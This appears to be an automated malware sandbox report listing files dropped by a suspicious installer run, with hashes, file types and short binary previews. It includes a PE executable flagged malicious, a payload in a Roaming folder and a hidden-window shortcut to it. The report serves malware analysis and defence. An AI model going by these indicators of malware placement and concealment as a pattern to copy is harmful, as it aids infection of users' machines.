                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G
                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):5622661
                                                                                                                                                                Entropy (8bit):7.712440057893304
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:98304:9dcsjAcC3kmUPeLv6p5DBkkIKBHB3D4CW0a+Tl3rRhNCMeN:HcxcC3YW769eKBSyV51C9
                                                                                                                                                                MD5:B8D52ACEC13C4F4EFEB44A769D6832F1
                                                                                                                                                                SHA1:FAC39ADBCDC92DA37989435E23BC5FE6B9A3B4D7
                                                                                                                                                                SHA-256:68E9DBF1BD3463875DD8ED005D781DBE830D34F0DC71622FB65E8C133FCEF2F4
                                                                                                                                                                SHA-512:A933583BC857A2655E7389350DD84C971F33930C53C32E5D17EA5726CDDC165799B4D29C750956D68DBDBE0BF8A09A9E54E6C5DA5AF98777C6C4513B124B727B
                                                                                                                                                                Malicious:false
Preview:{..==..'1..z.......9;..&5..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..zn..di..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):154477
                                                                                                                                                                Entropy (8bit):7.835886983924039
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):75044
                                                                                                                                                                Entropy (8bit):7.963079277535475
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:vZoDkDEgiC5dTUJtIevuLVwx5bF8JnMxnTBZjeaExdoz/M7tHLuj:vZssoC5dUpuLVw/B4MxnFZWMz/M7tHe
                                                                                                                                                                MD5:B9A848C1E51E617BAEAF2AFE76C6C264
                                                                                                                                                                SHA1:354199EB9F3A36D962D06E212E8C80D7277873B4
                                                                                                                                                                SHA-256:CD9C4AC0ECDBF3E63BBD524B37A69AF378BE8D41AC180FC0377F4DB05A336DF3
                                                                                                                                                                SHA-512:DA6B276BA4FE6AC0C2CB1E5B99D932EC63F57F82743B9854EB8DF358F6690FF7D07185B377C0EB0197E0806757F3612494840046996FEE66E683E8F9BEE8F992
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...qiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:695f8e9f-409d-324a-b50a-1e3067707628" xmpMM:DocumentID="xmp.did:91EA24D7191011E5B1FF9488C51C29D1" xmpMM:InstanceID="xmp.iid:91EA24D6191011E5B1FF9488C51C29D1" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6a6b844a-8117-4c4c-9b2f-30d3769ed7c7" stRef:documentID="xmp.did:695f8e9f-409d-324a-b50a-1e3067707628"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>^.i.....IDATx.bb .0..;./..;@...A.P9F...y
                                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):2364728
                                                                                                                                                                Entropy (8bit):6.606009669324617
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:49152:lbCT2kOGRpfJMi3kLRQrjYgeeZyTDwMHfDYZNBi:TkOKMiY0BZMHfDYZNBi
                                                                                                                                                                MD5:967F4470627F823F4D7981E511C9824F
                                                                                                                                                                SHA1:416501B096DF80DDC49F4144C3832CF2CADB9CB2
                                                                                                                                                                SHA-256:B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
                                                                                                                                                                SHA-512:8883EAD428C9D4B415046DE9F8398AA1F65AE81FE7945A840C822620E18F6F9930CCE2E10ACFF3B5DA8B9C817ADE3DABC1DE576CBD255087267F77341900A41C
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Joe Sandbox View:
• Filename: cLm7ThwEvh.msi, Detection: malicious
• Filename: LVkAi4PBv6.exe, Detection: malicious
• Filename: w3245.exe, Detection: malicious
• Filename: w3245.exe, Detection: malicious
• Filename: 9mauyKC3JW.exe, Detection: malicious
• Filename: ATLEQQXO.exe, Detection: malicious
• Filename: ATLEQQXO.exe, Detection: malicious
• Filename: upgrade.hta, Detection: malicious
• Filename: MiJZ3z4t5K.exe, Detection: malicious
• Filename: UolJwovI8c.exe, Detection: malicious
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:<..To..To..To.:.o..To...o..To.:9o..To.:.o..To.:/o..To..Uoe.To...o|.To...o..To...o..To...o..ToRich..To................PE..d...^.?e..........#......H.....................@..............................%.....h.$.....................................................XW..,........q...p..$h....#.8)......................................(....................`...............................text...RG.......H.................. ..`.rdata..R/...`...0...L..............@..@.data................|..............@....pdata..$h...p...j..................@..@Shared...............p..............@....tls.................x..............@....rsrc....q.......r...z..............@..@................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Users\user\Desktop\kXzODlqJak.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):745
                                                                                                                                                                Entropy (8bit):5.468734318091139
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:kbe3uXNULLWUzMpbUbMSRcP2EmRKgbMSRcP2EWKhbMSRcP2rRKeZHFwzCrbD:k8YNwLLzCotcP2rtcP2ytcP2LZHWzof
                                                                                                                                                                MD5:997E4C602834F96C7B0E35EC673C44E5
                                                                                                                                                                SHA1:5BD3CC881CB5F5585B1DC8FE4E0B0439E40280CA
                                                                                                                                                                SHA-256:B65C347A8A85D1E454931854BC71F669FAA01146137132743D744CD7BBD8B58D
                                                                                                                                                                SHA-512:A7FB6E6CC1966816C4C85B12D56FFEE23C4AE6FDDD56A2A27DD7C224A8FFE40C515725B9B99E8B1A509A6D0D1AC24964A4418CADC904424B63E89A39F64C6217
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:[1E2C:1E30][2025-01-09T08:41:29]i001: Burn x86 v4.0.0+8c757c0f67f26f21c6bcbbfb81b7ea8b91c35fe4, Windows v10.0 x64 (Build 19045: Service Pack 0), path: C:\Users\user\Desktop\kXzODlqJak.exe..[1E2C:1E30][2025-01-09T08:41:29]i009: Command Line: ''..[1E2C:1E30][2025-01-09T08:41:29]i000: Setting string variable 'WixBundleOriginalSource' to value 'C:\Users\user\Desktop\kXzODlqJak.exe'..[1E2C:1E30][2025-01-09T08:41:29]i000: Setting string variable 'WixBundleOriginalSourceFolder' to value 'C:\Users\user\Desktop\'..[1E2C:1E30][2025-01-09T08:41:29]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user~1\AppData\Local\Temp\Rubrician_20250109084129.cleanroom.log'..[1E2C:1E30][2025-01-09T08:41:31]i017: Exit code: 0x0..
                                                                                                                                                                Process:C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):1131
                                                                                                                                                                Entropy (8bit):5.52614210739312
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:EB8YNwLLzPgytB+wuBtcP2PBtcP22BMcP2LZHWXpBMcP2aBMcP2DBMcP2/1:EBLNubtBmBMWBMzBDOZsBDJBD6BDS1
                                                                                                                                                                MD5:631699B87AC06982E87F295C2727298D
                                                                                                                                                                SHA1:BE1CF7502E22840343F6ADF23AF9203E65FADB13
                                                                                                                                                                SHA-256:0BE52B05DAEFB6624A12847CC501F8F141C763B62ACC57A56245C20CE0F71669
                                                                                                                                                                SHA-512:EBF634235E90C20D7858F5F908BCF08901DCC59945EEBC0F1900D2BB8CF345942A52138E1C6FC48F0629D803A0C694D6C6C9B11CD3BD2A60BE5499D912CEC25B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:[1E60:1E64][2025-01-09T08:41:29]i001: Burn x86 v4.0.0+8c757c0f67f26f21c6bcbbfb81b7ea8b91c35fe4, Windows v10.0 x64 (Build 19045: Service Pack 0), path: C:\Windows\TEMP\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe..[1E60:1E64][2025-01-09T08:41:29]i009: Command Line: '-burn.clean.room=C:\Users\user\Desktop\kXzODlqJak.exe -burn.filehandle.attached=648 -burn.filehandle.self=652'..[1E60:1E64][2025-01-09T08:41:29]i000: Setting string variable 'WixBundleOriginalSource' to value 'C:\Users\user\Desktop\kXzODlqJak.exe'..[1E60:1E64][2025-01-09T08:41:29]i000: Setting string variable 'WixBundleOriginalSourceFolder' to value 'C:\Users\user\Desktop\'..[1E60:1E64][2025-01-09T08:41:31]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user~1\AppData\Local\Temp\Rubrician_20250109084131.log'..[1E60:1E64][2025-01-09T08:41:31]i000: Setting string variable 'WixBundleInProgressName' to value ''..[1E60:1E64][2025-01-09T08:41:31]i000: Setting string variable 'WixBundle
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1
                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.
                                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Jan 9 12:41:32 2025, mtime=Thu Jan 9 12:41:33 2025, atime=Fri Jan 3 18:13:10 2025, length=6487736, window=hide
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1033
                                                                                                                                                                Entropy (8bit):4.968192360127806
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:84Cur2X9+pocmPIiAHFYoX7zvMJTMJtm:8lur2XAotIBHFYwkJwJt
                                                                                                                                                                MD5:1E9A7D9E253D9C9496F62A1DC1830C19
                                                                                                                                                                SHA1:7A94D862A6AFFE6B2DFDA6FDF9BA9B203D16435B
                                                                                                                                                                SHA-256:55ED767F2198457929DE79887AEF583792853B6906CB82860AA9C0B6935DA1C8
                                                                                                                                                                SHA-512:0647B1E1BCFD87757CA71D541411E0D66E3BA8B6C1DBE7AB40C240296F328DF99164768C5446526FAF58F054AEFF79361C6CCD53FDF6940E9B2FD0B7ADBDC8F4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:L..................F.... ...uW.1.b....%2.b.......^....b.......................:..DG..Yr?.D..U..k0.&...&......Qg.*_....#...b.....8.b......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=)Z$m..........................3*N.A.p.p.D.a.t.a...B.V.1.....)Z1m..Roaming.@......EW.=)Z2m..............................R.o.a.m.i.n.g.....t.1.....)Z1m..REMOTE~1..\......)Z1m)Z2m...........................)..R.e.m.o.t.e.s.e.r.v.i.c.e.z.o.o._.t.e.s.t.....r.2...b.#Z.. .RESCUE~1.EXE..V......)Z1m)Z1m..............................R.e.s.c.u.e.C.D.B.u.r.n.e.r...e.x.e.......z...............-.......y............0t.....C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe..N.....\.....\.....\.....\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.R.e.m.o.t.e.s.e.r.v.i.c.e.z.o.o._.t.e.s.t.\.R.e.s.c.u.e.C.D.B.u.r.n.e.r...e.x.e.`.......X.......376483...........hT..CrF.f4... ..../Tc...,......hT..CrF.f4... ..../Tc...,......E.......9...1SPS..mD..pH.H@..=x.....h...
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1420
                                                                                                                                                                Entropy (8bit):5.395685258291011
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:YK0bl5r75riCe0qW+5Ua02EHP5IKL0jZ5JwbX/B+L0Zth5G5QP0ZoL5M:YK0bl5r75riN0qW+5Ua02sP5IKL0jZ5H
                                                                                                                                                                MD5:7EC32E4964A6DCA5C7264DD89820B5BC
                                                                                                                                                                SHA1:527E5A8AEA34B5BD86D83F0B4A46F2A92529315F
                                                                                                                                                                SHA-256:D3D9F412C91EF44BADC8F6CD0AB847B500F025CF1294D9D6C3B172C7FE7868C3
                                                                                                                                                                SHA-512:2D8FDE8D6070F408AC00F57EE81C10ED462536EA6FFA5C6D1A676B215FF5A071065D93CC167ABDB4293BC8298DFAC0C163A0D90342814CB5B0AE374B4221A9D9
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"logTime": "1005/074019", "correlationVector":"Jzai6BfByv5amZ45/NBe5r","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"eO8FwRQNRwFtIUhPNa0yBN","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"DFCC0B139A2547CAA3433B33892C7FE6","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075031", "correlationVector":"bWXPYvVSVVANvrGBV6dHxn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075032", "correlationVector":"4CD8E3A1D096444AAB77DA6A690C4356","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075123", "correlationVector":"t3DmiSvoNTibe+/mLDIMfl","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075124", "correlationVector":"B2B504519464422FA5C6E610072CF270","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075313", "correlationVector":"/q9eTq3f/ZawbQrLDVWKju","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075314", "correlationVector":"138D0C7D
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):31335
                                                                                                                                                                Entropy (8bit):7.694019108205432
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty8:5WcDWyRKNVd2M/IxMuYEDlymsTQ8
                                                                                                                                                                MD5:6B72597205C77D3E40E1A35BEE403801
                                                                                                                                                                SHA1:6BECEE055C6E057AF9475B6D651B4EE561D02F20
                                                                                                                                                                SHA-256:C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
                                                                                                                                                                SHA-512:7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......
                                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2526208
                                                                                                                                                                Entropy (8bit):6.697179434185451
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:49152:qMKUORaA3LORJ81Ba8+bCo4volrEPbyI0iQXAtQJXT0HcCIFZxXQNw07f7E5GGsP:u90jwASKZpgN
                                                                                                                                                                MD5:E1EF99935026E1F84F065C75819BF8E8
                                                                                                                                                                SHA1:1AE0CD73731E784F733D30AC2043FC0E85914EC1
                                                                                                                                                                SHA-256:1634B7E132C988B7142F2DB5B0F20059DEEDCDF9F8EC16222C495D9047F3E52C
                                                                                                                                                                SHA-512:5AB53D5E9C74581E7FBCF5E7291D3FB7C8844C119FD12DAC2D25C94A534ED3048C2FBB4B6B4B167B98FEDCE9B9A1B2B2D80E3E279EEA5A792FFD865FEDE616AA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...H..W.................. ..p&.....W..........@..............................0.......&...`... ..............................................P0.......0.8.....%..t............0............................. .%.(...................hQ0..............................text..... ....... .................`..`.data......... ....... .............@....rdata........!.......!.............@..@.pdata...t....%..v....%.............@..@.xdata...W...@&..X....&.............@..@.bss..........&..........................idata.......P0......b&.............@....CRT....0....`0......h&.............@....tls.........p0......j&.............@....rsrc...8.....0......l&.............@..@.reloc........0......n&.............@..Bsfdel.... ....0......t&.............@...................................................................................................................................
                                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):2526208
                                                                                                                                                                Entropy (8bit):6.697179434185451
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:49152:qMKUORaA3LORJ81Ba8+bCo4volrEPbyI0iQXAtQJXT0HcCIFZxXQNw07f7E5GGsP:u90jwASKZpgN
                                                                                                                                                                MD5:E1EF99935026E1F84F065C75819BF8E8
                                                                                                                                                                SHA1:1AE0CD73731E784F733D30AC2043FC0E85914EC1
                                                                                                                                                                SHA-256:1634B7E132C988B7142F2DB5B0F20059DEEDCDF9F8EC16222C495D9047F3E52C
                                                                                                                                                                SHA-512:5AB53D5E9C74581E7FBCF5E7291D3FB7C8844C119FD12DAC2D25C94A534ED3048C2FBB4B6B4B167B98FEDCE9B9A1B2B2D80E3E279EEA5A792FFD865FEDE616AA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...H..W.................. ..p&.....W..........@..............................0.......&...`... ..............................................P0.......0.8.....%..t............0............................. .%.(...................hQ0..............................text..... ....... .................`..`.data......... ....... .............@....rdata........!.......!.............@..@.pdata...t....%..v....%.............@..@.xdata...W...@&..X....&.............@..@.bss..........&..........................idata.......P0......b&.............@....CRT....0....`0......h&.............@....tls.........p0......j&.............@....rsrc...8.....0......l&.............@..@.reloc........0......n&.............@..Bsfdel.... ....0......t&.............@...................................................................................................................................
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:Google Chrome extension, version 3
Category:dropped
Size (bytes):154477
Entropy (8bit):7.835886983924039
Encrypted:false
SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
MD5:14937B985303ECCE4196154A24FC369A
SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
Malicious:false
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):4982
Entropy (8bit):7.929761711048726
Encrypted:false
SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
MD5:913064ADAAA4C4FA2A9D011B66B33183
SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
Malicious:false
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):908
Entropy (8bit):4.512512697156616
Encrypted:false
SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
MD5:12403EBCCE3AE8287A9E823C0256D205
SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
Malicious:false
Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1285
Entropy (8bit):4.702209356847184
Encrypted:false
SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
SHA1:58979859B28513608626B563138097DC19236F1F
SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
Malicious:false
Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1244
Entropy (8bit):4.5533961615623735
Encrypted:false
SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
MD5:3EC93EA8F8422FDA079F8E5B3F386A73
SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
